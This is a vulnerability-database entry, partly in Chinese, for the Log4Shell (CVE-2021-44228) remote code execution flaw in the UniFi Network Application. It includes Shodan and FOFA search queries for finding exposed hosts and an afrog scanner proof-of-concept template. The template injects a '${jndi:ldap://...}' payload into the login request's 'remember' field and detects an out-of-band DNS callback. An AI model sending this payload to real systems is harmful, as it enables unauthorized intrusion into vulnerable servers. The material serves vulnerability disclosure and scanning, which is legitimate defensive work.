unifi-network-log4j-rce: UniFi Network Log4j JNDI RCE

日期: 2025-09-01 | 影响软件: Unifi Network | POC: 已公开

漏洞描述

A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted UniFi Network Application . shodan-query: http.title:"UniFi Network" fofa: UniFi network

PoC代码[已公开]

id: unifi-network-log4j-rce

info:
  name: UniFi Network Log4j JNDI RCE
  author: KrE80r, NLEG
  severity: critical
  verified: true
  description: |
    A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted UniFi Network Application .
    shodan-query: http.title:"UniFi Network"
    fofa: UniFi network
  reference:
    - https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e
    - https://twitter.com/sprocket_ed/status/1473301038832701441
  tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
  created: 2023/06/10

set:
  rooturl: request.url
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: POST
      path: /api/login
      headers:
        Content-Type: application/json; charset=utf-8
        Origin: "{{rooturl}}"
        Referer: "{{rooturl}}/manage/account/login?redirect=%2Fmanage"
      body: |
        {"username":"user","password":"pass","remember":"${jndi:ldap://{{oobDNS}}}","strict":true}
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/unifi-network-log4j-rce.yaml

相关漏洞推荐